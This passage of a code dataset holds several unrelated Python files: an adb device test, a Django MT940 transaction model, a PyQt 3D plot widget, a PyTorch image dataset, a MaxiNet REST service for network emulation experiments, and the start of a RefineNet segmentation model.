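    for _ in range(max_tries):
        result = condition()
        if result:
            return result
        time.sleep(wait_period)
    return None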
to.\"\"\"\n external_storage = under_test.Shell('echo $EXTERNAL_STORAGE').strip()\n if not external_storage:\n self.skipTest('External storage not available.')\n while True:\n random_hex = hex(random.randint(0, 2**52))[2:]\n name = 'tmp_push_test%s' % random_hex\n path = posixpath.join(external_storage, name)\n try:\n under_test.Shell('ls %s' % path)\n except device_errors.AdbShellCommandFailedError:\n break\n under_test.Shell('mkdir %s' % path)\n try:\n yield path\n finally:\n under_test.Shell('rm -rf %s' % path)\n\n def testPush_fileToFile(self):\n under_test = self.getTestInstance()\n with self.getTestPushDestination(under_test) as push_target_directory:\n src = os.path.join(_TEST_DATA_DIR, 'push_file.txt')\n dest = posixpath.join(push_target_directory, 'push_file.txt')\n with self.assertRaises(device_errors.AdbShellCommandFailedError):\n under_test.Shell('ls %s' % dest)\n under_test.Push(src, dest)\n self.assertEquals(dest, under_test.Shell('ls %s' % dest).strip())\n\n def testPush_fileToDirectory(self):\n under_test = self.getTestInstance()\n with self.getTestPushDestination(under_test) as push_target_directory:\n src = os.path.join(_TEST_DATA_DIR, 'push_file.txt')\n dest = push_target_directory\n resulting_file = posixpath.join(dest, 'push_file.txt')\n with self.assertRaises(device_errors.AdbShellCommandFailedError):\n under_test.Shell('ls %s' % resulting_file)\n under_test.Push(src, dest)\n self.assertEquals(resulting_file,\n under_test.Shell('ls %s' % resulting_file).strip())\n\n def testPush_directoryToDirectory(self):\n under_test = self.getTestInstance()\n with self.getTestPushDestination(under_test) as push_target_directory:\n src = os.path.join(_TEST_DATA_DIR, 'push_directory')\n dest = posixpath.join(push_target_directory, 'push_directory')\n with self.assertRaises(device_errors.AdbShellCommandFailedError):\n under_test.Shell('ls %s' % dest)\n under_test.Push(src, dest)\n self.assertEquals(\n sorted(os.listdir(src)),\n sorted(under_test.Shell('ls %s' % dest).strip().split()))\n\n def testPush_directoryToExistingDirectory(self):\n under_test = self.getTestInstance()\n with self.getTestPushDestination(under_test) as push_target_directory:\n src = os.path.join(_TEST_DATA_DIR, 'push_directory')\n dest = push_target_directory\n resulting_directory = posixpath.join(dest, 'push_directory')\n with self.assertRaises(device_errors.AdbShellCommandFailedError):\n under_test.Shell('ls %s' % resulting_directory)\n under_test.Shell('mkdir %s' % resulting_directory)\n under_test.Push(src, dest)\n self.assertEquals(\n sorted(os.listdir(src)),\n sorted(under_test.Shell('ls %s' % resulting_directory).split()))\n\n # TODO(jbudorick): Implement tests for the following:\n # taskset -c\n # devices [-l]\n # pull\n # shell\n # ls\n # logcat [-c] [-d] [-v] [-b]\n # forward [--remove] [--list]\n # jdwp\n # install [-l] [-r] [-s] [-d]\n # install-multiple [-l] [-r] [-s] [-d] [-p]\n # uninstall [-k]\n # backup -f [-apk] [-shared] [-nosystem] [-all]\n # restore\n # wait-for-device\n # get-state (BROKEN IN THE M SDK)\n # get-devpath\n # remount\n # reboot\n # reboot-bootloader\n # root\n # emu\n\n @classmethod\n def tearDownClass(cls):\n print('')\n print('')\n print('tested %s' % adb_wrapper.AdbWrapper.GetAdbPath())\n print(' %s' % adb_wrapper.AdbWrapper.Version())\n print('connected devices:')\n try:\n for d in adb_wrapper.AdbWrapper.Devices():\n print(' %s' % d)\n except device_errors.AdbCommandFailedError:\n print(' ')\n raise\n finally:\n print('')\n\n\nif __name__ == '__main__':\n 
sys.exit(unittest.main())\n","sub_path":"devil/devil/android/sdk/adb_compatibility_devicetest.py","file_name":"adb_compatibility_devicetest.py","file_ext":"py","file_size_in_byte":7627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"591648239","text":"from django.db.models import Sum, F, When, Case, BooleanField, FloatField\nfrom django.db import models, transaction as db_transaction\nfrom django.apps import apps\n\nfrom ...utils.mt940 import parse_mt940, parse_mt940_transaction_details\nfrom ..base import CroesusQueryset\n\n__all__ = [\n 'Transaction',\n]\n\n\nclass TransactionQuerySet(CroesusQueryset):\n PRETTYTABLE_FIELDS = [\n 'pk',\n 'amount',\n 'date',\n 'person',\n 'purpose',\n 'bookings_amount',\n 'bookable',\n ]\n\n def match_ibans(self):\n for transaction in self.iterator():\n transaction.match_iban()\n\n\nclass TransactionManager(models.Manager):\n def get_queryset(self):\n return TransactionQuerySet(\n self.model,\n using=self._db,\n ).annotate(\n bookings_amount=Sum('bookings__amount'),\n ).annotate(\n underbooked=Case(\n When(bookings_amount__isnull=True, then=True),\n When(bookings_amount__lt=F('amount'), then=True),\n output_field=BooleanField(),\n default=False,\n ),\n booked=Case(\n When(bookings_amount__gte=F('amount'), then=True),\n output_field=BooleanField(),\n default=False,\n ),\n overbooked=Case(\n When(bookings_amount__gt=F('amount'), then=True),\n output_field=BooleanField(),\n default=False,\n ),\n bookable=Case(\n When(bookings_amount__isnull=False,\n then=F('amount') - F('bookings_amount')),\n output_field=FloatField(),\n default=F('amount'),\n ),\n )\n\n @db_transaction.atomic\n def parse_statement(self, statement, parse_details=True, match_ibans=True):\n dates = [i[0] for i in self.values_list('date')]\n objects = []\n\n mt940_transactions = parse_mt940(statement.data)\n\n bank_code, account_number =\\\n mt940_transactions.data['account_identification'].split('/')\n\n for mt940_transaction in parse_mt940(statement.data):\n data = mt940_transaction.data\n\n # skip dataset if date is already known to the database\n # this is to avoid glitches\n if data['date'] in dates:\n continue\n\n final_opening_balance = data.get('final_opening_balance', None)\n final_closing_balance = data.get('final_closing_balance', None)\n\n if final_opening_balance:\n final_opening_balance = final_opening_balance.amount.amount\n\n if final_closing_balance:\n final_closing_balance = final_closing_balance.amount.amount\n\n objects.append(Transaction(\n statement=statement,\n bank_code=bank_code,\n account_number=account_number,\n date=data['date'],\n amount=float(data['amount'].amount),\n details=data['transaction_details'],\n currency=data['currency'],\n final_opening_balance=final_opening_balance,\n final_closing_balance=final_closing_balance,\n ))\n\n if objects:\n if parse_details or match_ibans:\n for obj in objects:\n if parse_details:\n obj.parse_details(save=False)\n\n if match_ibans:\n obj.match_iban(save=False)\n\n self.bulk_create(objects)\n\n return len(objects)\n\n\nclass Transaction(models.Model):\n objects = TransactionManager()\n\n # data\n statement = models.ForeignKey('croesus_core.Statement', blank=True,\n null=True, verbose_name='Statement')\n\n created = models.DateTimeField(auto_now_add=True, editable=False)\n\n # parsed data\n amount = models.FloatField(blank=True, null=True)\n currency = models.CharField(max_length=8, blank=True, null=True)\n date = models.DateField(blank=True, null=True)\n bank_code = 
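# Pure-Python sketch (illustrative only) of the booking states the manager
# above derives via SQL annotations:
def booking_state(amount, bookings):
    total = sum(bookings)
    return {
        'underbooked': total < amount,
        'booked': total >= amount,
        'overbooked': total > amount,
        'bookable': max(amount - total, 0.0),
    }

assert booking_state(100.0, [40.0, 60.0])['booked']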
models.CharField(max_length=16, blank=True, null=True)\n account_number = models.CharField(max_length=16, blank=True, null=True)\n details = models.TextField(blank=True, null=True)\n\n final_opening_balance = models.FloatField(blank=True, null=True)\n final_opening_balance_date = models.DateField(blank=True, null=True)\n\n final_closing_balance = models.FloatField(blank=True, null=True)\n final_closing_balance_date = models.DateField(blank=True, null=True)\n\n # data parsed from details\n name = models.CharField(max_length=128, blank=True, null=True)\n purpose = models.TextField(blank=True, null=True)\n\n iban = models.CharField(max_length=30, blank=True, null=True,\n verbose_name='IBAN')\n\n bic = models.CharField(max_length=11, blank=True, null=True,\n verbose_name='BIC')\n\n person = models.ForeignKey('croesus_core.Person', blank=True, null=True,\n verbose_name='Person')\n\n # additional data\n comment = models.TextField(blank=True, null=True)\n\n def get_bookings_amount(self):\n return self.bookings.aggregate(Sum('amount'))['amount__sum'] or 0.0\n\n def get_bookable(self):\n bookings_amount = self.get_bookings_amount()\n\n if bookings_amount >= self.amount:\n return 0.0\n\n return self.amount - self.get_bookings_amount()\n\n def is_underbooked(self):\n return self.get_bookings_amount() < self.amount\n\n def is_booked(self):\n return self.get_bookings_amount() >= self.amount\n\n def is_overbooked(self):\n return self.get_bookings_amount() > self.amount\n\n def parse_details(self, save=True):\n details = parse_mt940_transaction_details(self.details,\n bank_code=self.bank_code)\n\n for key, value in details.items():\n setattr(self, key, value)\n\n if save:\n self.save()\n\n def match_iban(self, save=True):\n PersonAccount = apps.get_model('croesus_core', 'PersonAccount')\n\n if not self.iban:\n return\n\n pa = PersonAccount.objects.filter(iban=self.iban)\n\n if pa.count() == 1:\n self.person = pa[0].person\n\n if save:\n self.save()\n\n def book(self, account, amount=None, date=None):\n Booking = apps.get_model('croesus_core', 'Booking')\n\n return Booking.objects.create(\n transaction=self,\n account=account,\n amount=amount or self.get_bookable(),\n date=date,\n )\n\n def donate(self, amount=None, date=None):\n Account = apps.get_model('croesus_core', 'Account')\n\n return self.book(\n account=Account.objects.get_donation_account(),\n amount=amount,\n date=date,\n )\n\n def __str__(self):\n return 'pk={}, date={}, person={}, amount={}'.format(\n self.pk, self.date, self.person or self.name, self.amount)\n","sub_path":"croesus_core/models/bank/transaction.py","file_name":"transaction.py","file_ext":"py","file_size_in_byte":7078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"329671858","text":"from PyQt5.QtWidgets import *\nimport os\nimport random\n\n\nfrom numpy import arange, sin, pi\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.figure import Figure\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfrom PyQt5 import QtCore, QtWidgets\n\n\nclass MyMplCanvas(FigureCanvas):\n \"\"\"Ultimately, this is a QWidget (as well as a FigureCanvasAgg, etc.).\"\"\"\n\n def __init__(self, parent=None, width=5, height=4, dpi=100):\n fig = Figure(figsize=(width, height), dpi=dpi)\n self.axes = fig.gca(projection='3d')\n\n self.compute_initial_figure()\n\n FigureCanvas.__init__(self, fig)\n self.setParent(parent)\n\n FigureCanvas.setSizePolicy(self,\n QtWidgets.QSizePolicy.Expanding,\n 
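# Minimal non-Qt sketch (assumes only matplotlib is installed) of the 3D
# figure setup MyMplCanvas performs; add_subplot(projection='3d') replaces
# the older fig.gca(projection='3d') spelling used above.
from matplotlib.backends.backend_agg import FigureCanvasAgg
from matplotlib.figure import Figure
from mpl_toolkits.mplot3d import Axes3D  # noqa: F401  (registers '3d')

fig = Figure(figsize=(5, 4), dpi=100)
FigureCanvasAgg(fig)  # attach an off-screen canvas so savefig works
axes = fig.add_subplot(projection='3d')
axes.plot(range(10), range(10), zs=range(10))
fig.savefig('demo3d.png')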
QtWidgets.QSizePolicy.Expanding)\n FigureCanvas.updateGeometry(self)\n\n def compute_initial_figure(self):\n pass\n\nclass MyDynamicMplCanvas(MyMplCanvas):\n \"\"\"A canvas that updates itself every second with a new plot.\"\"\"\n\n plot_length = 10\n num_lines = 1\n lines = [[range(10), range(10)] for i in range(0, 1)]\n colours = ['r', 'b', 'y', 'c', 'g', 'm', 'k', '#ee00ff', '#00feee', '#ffee00']\n colours_dim = ['#ffaaaa', 'b', 'y', 'c', 'g', 'm', 'k', '#ee00ff', '#00feee', '#ffee00']\n\n def __init__(self, *args, **kwargs):\n MyMplCanvas.__init__(self, *args, **kwargs)\n timer = QtCore.QTimer(self)\n timer.timeout.connect(self.update_figure)\n timer.start(10000)\n\n def update_and_plot(self):\n\n for i in range(0, self.num_lines):\n self.lines[i][0] = [random.randint(0, 10) for i in range(self.plot_length)]\n self.lines[i][1] = [random.randint(0, 10) for i in range(self.plot_length)]\n\n zeros = [0 for i in range(0,10)]\n maxes = [10 for i in range(0, 10)]\n\n for i in range(0, self.num_lines):\n self.axes.plot(range(self.plot_length), self.lines[i][0], zeros, color=self.colours_dim[i])\n self.axes.plot(zeros, self.lines[i][0], zs=self.lines[i][1], color=self.colours_dim[i])\n self.axes.plot(range(self.plot_length), maxes, zs=self.lines[i][1], color=self.colours_dim[i])\n\n self.axes.plot(range(self.plot_length), self.lines[i][0], zs=self.lines[i][1], color=self.colours[i])\n\n\n def compute_initial_figure(self):\n self.update_and_plot()\n\n def update_figure(self):\n # Build a list of 4 random integers between 0 and 10 (both inclusive)\n self.axes.cla()\n self.update_and_plot()\n self.draw()\n\nclass SingleRender(QGroupBox):\n def __init__(self, *args, **kwargs):\n self.title_name = kwargs.pop(\"Title\")\n super().__init__(*args, **kwargs)\n\n layout = QVBoxLayout()\n\n self.title_label = QLabel(self.title_name)\n\n layout.addWidget(self.title_label)\n\n #l = QtWidgets.QVBoxLayout(self.main_widget)\n dc = MyDynamicMplCanvas( width=5, height=4, dpi=100)\n layout.addWidget(dc)\n\n\n self.setLayout(layout)","sub_path":"single_render.py","file_name":"single_render.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"649312222","text":"import os\n\nimport PIL\nimport pandas as pd\nimport torch\nfrom torch.utils.data import Dataset\n\n\nclass TagImageDataset(Dataset):\n def __init__(self, data_frame: pd.DataFrame, root_dir: str, transform=None):\n self.data_frame = data_frame\n self.root_dir = root_dir\n self.transform = transform\n\n def __len__(self):\n return len(self.data_frame)\n\n def __getitem__(self, idx):\n sample = dict()\n if torch.is_tensor(idx):\n idx = idx.tolist()\n\n img_name = self.data_frame.iloc[idx]['file_name']\n img_path = os.path.join(self.root_dir, img_name)\n image = PIL.Image.open(img_path).convert('RGB')\n if self.transform:\n image = self.transform(image)\n sample['image'] = image\n cat_name = self.data_frame.iloc[idx]['answer']\n sample['label'] = cat_name\n sample['image_name'] = img_name\n return sample\n\n\nclass TagImageInferenceDataset(Dataset):\n def __init__(self, root_dir: str, transform=None):\n self.root_dir = root_dir\n self.transform = transform\n self.data_list = [img for img in os.listdir(self.root_dir) if not img.startswith('.')]\n\n def __len__(self):\n return len(self.data_list)\n\n def __getitem__(self, idx):\n sample = dict()\n if torch.is_tensor(idx):\n idx = idx.tolist()\n\n img_name = self.data_list[idx]\n img_path = os.path.join(self.root_dir, 
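# Hedged usage sketch for TagImageDataset above (the CSV name and image
# folder are placeholders; the frame must carry the file_name/answer columns
# that __getitem__ expects):
import pandas as pd
from torch.utils.data import DataLoader
from torchvision import transforms

tfm = transforms.Compose([transforms.Resize((224, 224)),
                          transforms.ToTensor()])
df = pd.read_csv('train_labels.csv')
loader = DataLoader(TagImageDataset(df, 'images/', transform=tfm),
                    batch_size=32, shuffle=True)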
img_name)\n image = PIL.Image.open(img_path).convert('RGB')\n if self.transform:\n image = self.transform(image)\n sample['image'] = image\n sample['image_name'] = img_name\n return sample","sub_path":"iitp_category/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"433824625","text":"#!/usr/bin/python\n# Copyright 2017 Telstra Open Source\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n\nfrom bottle import get, post, request, run, Bottle, response, request, error, abort\n\nfrom mininet.topo import Topo\nfrom mininet.node import OVSSwitch\n\nfrom MaxiNet.Frontend import maxinet\nfrom MaxiNet.tools import Tools\n\nfrom jsonschema import validate, ValidationError\nimport logging\nimport json\nimport socket\n\ncluster_schema = {\n \"$schema\": \"http://json-schema.org/draft-04/schema#\",\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\n \"type\": \"string\"\n },\n \"minWorkers\": {\n \"type\": \"integer\"\n },\n \"maxWorkers\": {\n \"type\": \"integer\"\n }\n },\n \"required\": [\n \"name\",\n \"minWorkers\",\n \"maxWorkers\"\n ]\n}\n\nexperiment_schema = {\n \"$schema\": \"http://json-schema.org/draft-04/schema#\",\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\n \"type\": \"string\"\n },\n \"cluster\": {\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\n \"type\": \"string\"\n },\n },\n },\n \"topo\": {\n \"type\": \"object\",\n \"properties\": {\n \"hosts\": {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\n \"type\": \"string\"\n },\n },\n },\n },\n \"switches\": {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\n \"type\": \"string\"\n },\n },\n },\n },\n \"links\": {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\n \"type\": \"string\"\n },\n },\n },\n },\n },\n },\n },\n \"required\": [\n \"name\",\n \"cluster\",\n \"topo\"\n ]\n}\n\nhost_schema = {\n \"$schema\": \"http://json-schema.org/draft-04/schema#\",\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\n \"type\": \"string\"\n },\n \"pos\": {\n \"type\": \"string\"\n },\n },\n \"required\": [\n \"name\",\n \"pos\"\n ]\n}\n\nswitch_schema = {\n \"$schema\": \"http://json-schema.org/draft-04/schema#\",\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\n \"type\": \"string\"\n },\n \"workerId\": {\n \"type\": \"integer\"\n }\n },\n \"required\": [\n \"name\",\n \"workerId\"\n ]\n}\n\nlink_schema = {\n \"$schema\": \"http://json-schema.org/draft-04/schema#\",\n \"type\": \"object\",\n \"properties\": {\n \"node1\": {\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\n \"type\": \"string\"\n },\n \"type\": {\n \"type\": \"string\"\n },\n },\n },\n \"node2\": {\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\n \"type\": \"string\"\n },\n \"type\": {\n \"type\": \"string\"\n },\n },\n }\n 
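# Illustrative request body (an assumption, not from the original file) that
# validates against cluster_schema above:
from jsonschema import validate

example_cluster = {"name": "c1", "minWorkers": 1, "maxWorkers": 4}
validate(example_cluster, cluster_schema)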
},\n \"required\": [\n \"node1\",\n \"node2\"\n ]\n}\n\n@error(500)\ndef error_handler_500(error):\n return json.dumps({\"message\": str(error.exception)})\n\n@error(400)\ndef error_handler_400(error):\n return json.dumps({\"message\": str(error.exception)})\n\n@post('/frontend/cluster')\ndef create_cluster():\n try:\n logger.debug(\"creating cluster with json={}\"\n .format(request.json))\n validate(request.json, cluster_schema)\n name = _create_cluster(request.json)\n response.content_type = 'application/json'\n response.status = 201\n response.set_header('Location', \"http://frontend/cluster/{}\".format(name))\n return json.dumps({'name': name})\n except ValidationError as e:\n abort(400, e.message)\n\ndef _create_cluster(cluster):\n name = cluster['name']\n minWorkers = cluster['minWorkers']\n maxWorkers = cluster['maxWorkers']\n logger.debug(\"creating cluster with minWorkers={}, maxWorkers={}\"\n .format(minWorkers, maxWorkers))\n c = maxinet.Cluster(minWorkers = minWorkers, maxWorkers = maxWorkers)\n clusters[name] = c\n return name\n\ndef create_topo(topo):\n t = Topo()\n\n i = 1\n for host in topo['hosts']:\n logger.debug(\"add host {} to topo\" .format(host['name']))\n t.addHost(host['name'], ip=Tools.makeIP(i), mac=Tools.makeMAC(i))\n i += 1\n\n i = 1\n for switch in topo['switches']:\n logger.debug(\"add switch {} to topo\" .format(switch['name']))\n t.addSwitch(switch['name'], dpid=Tools.makeDPID(i))\n i += 1\n\n i = 1\n for link in topo['links']:\n logger.debug(\"add link from {} to {} to topo\" .format(link['node1']['name'], link['node2']['name']))\n t.addLink(link['node1']['name'], link['node2']['name'])\n i += 1\n\n return t\n\n\n@post('/frontend/experiment')\ndef create_experiment():\n try:\n validate(request.json, experiment_schema)\n name = _create_experiment(request.json['name'], request.json['cluster'], request.json['topo'])\n response.content_type = 'application/json'\n response.status = 201\n response.set_header('Location', \"http://frontend/experiment/{}\".format(name))\n return json.dumps({'name': name})\n except ValidationError as e:\n abort(400, e.message)\n\ndef _create_experiment(name, cluster, topo):\n logger.debug(\"creating experiment with name={}, cluster={}\"\n .format(name, cluster['name']))\n c = clusters[cluster['name']]\n t = create_topo(topo)\n experiment = maxinet.Experiment(c, t, switch=OVSSwitch)\n experiments[name] = experiment\n return name\n\n@get('/experiment/setup/')\ndef setup_experiment(name):\n logger.debug(\"setup experiment with name={}\" .format(name))\n experiment = experiments[name]\n experiment.setup()\n response.content_type = 'application/json'\n return json.dumps({'name': name})\n\n@get('/experiment/stop/')\ndef stop_experiment(name):\n logger.debug(\"stop experiment with name={}\" .format(name))\n experiment = experiments[name]\n experiment.stop()\n response.content_type = 'application/json'\n return json.dumps({'name': name})\n\n@get('/experiment/run///')\ndef setup_experiment(name, node, command):\n logger.debug(\"run command experiment={}, node={}, command={}\" .format(name, node, command))\n experiment = experiments[name]\n output = experiment.get_node(node).cmd(command)\n response.content_type = 'application/json'\n return json.dumps({'name': name, 'node': node, 'command': command, 'output': output})\n\n@post('/experiment//host')\ndef create_host(experiment):\n try:\n validate(request.json, host_schema)\n host = _create_host(experiment, request.json)\n response.content_type = 'application/json'\n response.status = 201\n 
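# Illustrative payload (an assumption) matching experiment_schema and the
# create_topo() walker above:
example_experiment = {
    "name": "exp1",
    "cluster": {"name": "c1"},
    "topo": {
        "hosts": [{"name": "h1"}, {"name": "h2"}],
        "switches": [{"name": "s1"}],
        "links": [
            {"node1": {"name": "h1"}, "node2": {"name": "s1"}},
            {"node1": {"name": "h2"}, "node2": {"name": "s1"}},
        ],
    },
}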
response.set_header('Location', \"http://experiment/{}/host/{}\".format(experiment, host.name))\n return json.dumps({'name': host.name, 'type': 'HOST'})\n except ValidationError as e:\n abort(400, e.message)\n\ndef _create_host(experiment, host):\n logger.debug(\"creating host for experiment={}, host={}, pos={}\"\n .format(experiment, host['name'], host['pos']))\n exp = experiments[experiment]\n host_id = len(exp.hosts) + 1\n hst = exp.addHost(host['name'], ip=Tools.makeIP(host_id), max=Tools.makeMAC(host_id), pos=host['pos'])\n return hst\n\n@post('/experiment//switch')\ndef create_switch(experiment):\n try:\n validate(request.json, switch_schema)\n switch = _create_switch(experiment, request.json)\n response.content_type = 'application/json'\n response.status = 201\n response.set_header('Location', \"http://experiment/{}/switch/{}\".format(experiment, switch.name))\n return json.dumps({'name': switch.name, 'type': 'SWITCH'})\n except ValidationError as e:\n abort(400, e.message)\n\ndef _create_switch(experiment, switch):\n exp = experiments[experiment]\n switch_id = len(exp.switches) + 1\n\n logger.debug(\"creating switch for experiment={}, switch={}, workerId={}, dpid={}\"\n .format(experiment, switch['name'], switch['workerId'], switch_id))\n sw = exp.addSwitch(switch['name'], dpid=Tools.makeDPID(switch_id), wid=switch['workerId'])\n return sw\n\n@post('/experiment//link')\ndef create_link(experiment):\n try:\n validate(request.json, link_schema)\n link = _create_link(experiment, request.json['node1'], request.json['node2'])\n response.content_type = 'application/json'\n response.status = 201\n\n # TODO - how to get info from the returned \"link\" object?\n response.set_header('Location', \"http://experiment/{}/link/{}/{}\".format(experiment, request.json['node1']['name'], request.json['node2']['name']))\n return json.dumps({'node1': {'name': request.json['node1']['name'], 'type': request.json['node1']['type']}, 'node2': {'name': request.json['node2']['name'], 'type': request.json['node2']['type']}})\n except ValidationError as e:\n abort(400, e.message)\n\ndef _create_link(experiment, node1, node2):\n exp = experiments[experiment]\n\n logger.debug(\"creating link for experiment={}, node1={}, node1type={}, node2={}, node2type={}\"\n .format(experiment, node1['name'], node1['type'], node2['name'], node2['type']))\n link = exp.addLink(node1['name'], node2['name'], autoconf=True)\n return link\n\ndef start_server(interface, port):\n run(host='0.0.0.0', port=port, debug=True)\n\n\ndef main():\n global logger\n global clusters\n global experiments\n clusters = {}\n experiments = {}\n\n logging.basicConfig(format='%(levelname)s:%(message)s',\n level=logging.DEBUG)\n logger = logging.getLogger()\n #mininet_cleanup()\n start_server('0.0.0.0', 38081)\n\nif __name__ == '__main__':\n main()\n","sub_path":"services/maxinet/app/maxinet_rest.py","file_name":"maxinet_rest.py","file_ext":"py","file_size_in_byte":10471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"186717939","text":"\nlista=[]\nvinicial=int(input('ingrese un valor inicial: '))\nvfinal=int(input('ingrese un valor final: '))\nvintervalo=int(input('ingrese el intervalo entre cada numero: '))\ncontador=0\nfor i in range(vinicial,vfinal+1,vintervalo):\n lista.append(i)\n contador=contador+i\nprint(lista)\nprint('la suma de los valores listados es: ', 
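# Hedged client sketch (assumes the bottle server from main() on port 38081;
# the route strings above appear to have lost their angle-bracket placeholder
# segments, so the path parameter below is a reconstructed assumption):
import requests

base = 'http://localhost:38081'
requests.post(base + '/frontend/cluster',
              json={'name': 'c1', 'minWorkers': 1, 'maxWorkers': 2})
requests.get(base + '/experiment/setup/exp1')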
contador)\n","sub_path":"py6_retos2/reto09.py","file_name":"reto09.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"636288263","text":"'''\nCreated on 22 Aug 2016\n\n@author: mozat\n'''\nimport multiprocessing\nimport time\nfrom visenze_multiprocessor_api import VisenzeMultiProcessor\nfrom visenze_logger import VisenzeLogger\nfrom client import ViSearchAPI\nfrom db.simple_dbs import MySQL\nfrom config import *\nfrom collections import defaultdict\nimport json\n\n\ndef analysis_log():\n import re\n log_file = './log/2017-08-19 11:23:08.log'\n processed = set()\n p = re.compile('INFO (\\d+)')\n with open(log_file, 'r') as fp:\n for line in fp.readlines():\n r = p.search(line)\n if r.groups():\n processed.add(r.groups()[0])\n return processed\n\n\ndef get_garments(num_process):\n garment_conn = MySQL(DEJA_ALGORITHM)\n sql = '''\n select garment_id, g_crop_url, g_tags_id, g_img_attribute, g_source_id from algorithm.deja_street_garment2;\n '''\n new_garments = garment_conn.fetch_rows(sql)\n garment_source_id = defaultdict(list)\n for idx, record in enumerate(new_garments):\n # if record['garment_id'] in processed:\n # continue\n visense_record = {'im_name': record['garment_id'],\n 'im_url': record['g_crop_url'],\n 'category': int(json.loads(record['g_tags_id'])['0'][0]),\n 'white': 1 if record['g_img_attribute'] == 'white' else 0,\n 'pid': record['g_source_id'].split('_')[0]\n }\n garment_source_id[idx % num_process].append(visense_record)\n return garment_source_id\n\n\nif __name__ == '__main__':\n processed = analysis_log()\n\n num_process = 20\n garment_source_id = get_garments(num_process)\n semaphores = multiprocessing.Semaphore(3)\n processes = []\n for key, value in garment_source_id.iteritems():\n p = VisenzeMultiProcessor(mode='insert', upload_task=value,\n semaphores=semaphores,\n check_existence=True)\n processes.append(p)\n p.start()\n for p in processes:\n p.join()\n pass\n","sub_path":"visearch_upload_photos/visenze_inserter.py","file_name":"visenze_inserter.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"550771721","text":"import torch.nn as nn\nimport torchvision.models as models\n\nfrom ..blocks import (\n RefineNetBlock,\n ResidualConvUnit,\n RefineNetBlockImprovedPooling\n)\n\n\nclass BaseRefineNet4Cascade(nn.Module):\n\n def __init__(self, input_shape,\n RefineNetBlock,\n num_classes=1,\n features=256,\n resnet_factory=models.resnet101,\n pretrained=True,\n freeze_resnet=True):\n \"\"\"Multi-path 4-Cascaded RefineNet for image segmentation\n\n Args:\n input_shape ((int, int)): (channel, size) assumes input has\n equal height and width\n refinenet_block (block): RefineNet Block\n num_classes (int, optional): number of classes\n features (int, optional): number of features in refinenet\n resnet_factory (func, optional): A Resnet model from torchvision.\n Default: models.resnet101\n pretrained (bool, optional): Use pretrained version of resnet\n Default: True\n freeze_resnet (bool, optional): Freeze resnet model\n Default: True\n\n Raises:\n ValueError: size of input_shape not divisible by 32\n \"\"\"\n super().__init__()\n\n input_channel, input_size = input_shape\n\n if input_size % 32 != 0:\n raise ValueError(f\"{input_shape} not divisble by 32\")\n\n resnet = resnet_factory(pretrained=pretrained)\n\n self.layer1 = nn.Sequential(\n resnet.conv1,\n resnet.bn1,\n resnet.relu,\n 
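# Standalone sketch of the round-robin sharding used in get_garments above:
# each record lands in bucket idx % num_process.
from collections import defaultdict

buckets = defaultdict(list)
num_process = 4
for idx, record in enumerate(range(10)):
    buckets[idx % num_process].append(record)
print(dict(buckets))  # {0: [0, 4, 8], 1: [1, 5, 9], 2: [2, 6], 3: [3, 7]}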
resnet.maxpool,\n resnet.layer1\n )\n\n self.layer2 = resnet.layer2\n self.layer3 = resnet.layer3\n self.layer4 = resnet.layer4\n\n if freeze_resnet:\n layers = [self.layer1, self.layer2, self.layer3, self.layer4]\n for layer in layers:\n for param in layer.parameters():\n param.requires_grad = False\n\n self.layer1_rn = nn.Conv2d(\n 256, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.layer2_rn = nn.Conv2d(\n 512, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.layer3_rn = nn.Conv2d(\n 1024, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.layer4_rn = nn.Conv2d(\n 2048, 2 * features, kernel_size=3, stride=1, padding=1, bias=False)\n\n self.refinenet4 = RefineNetBlock(\n 2 * features, (2 * features, input_size // 32))\n self.refinenet3 = RefineNetBlock(\n features, (2 * features, input_size // 32), (features, input_size // 16))\n self.refinenet2 = RefineNetBlock(\n features, (features, input_size // 16), (features, input_size // 8))\n self.refinenet1 = RefineNetBlock(\n features, (features, input_size // 8), (features, input_size // 4))\n\n self.output_conv = nn.Sequential(\n ResidualConvUnit(features),\n ResidualConvUnit(features),\n nn.Conv2d(features, num_classes, kernel_size=1, stride=1, padding=0, bias=True)\n )\n\n def forward(self, x):\n\n layer_1 = self.layer1(x)\n layer_2 = self.layer2(layer_1)\n layer_3 = self.layer3(layer_2)\n layer_4 = self.layer4(layer_3)\n\n layer_1_rn = 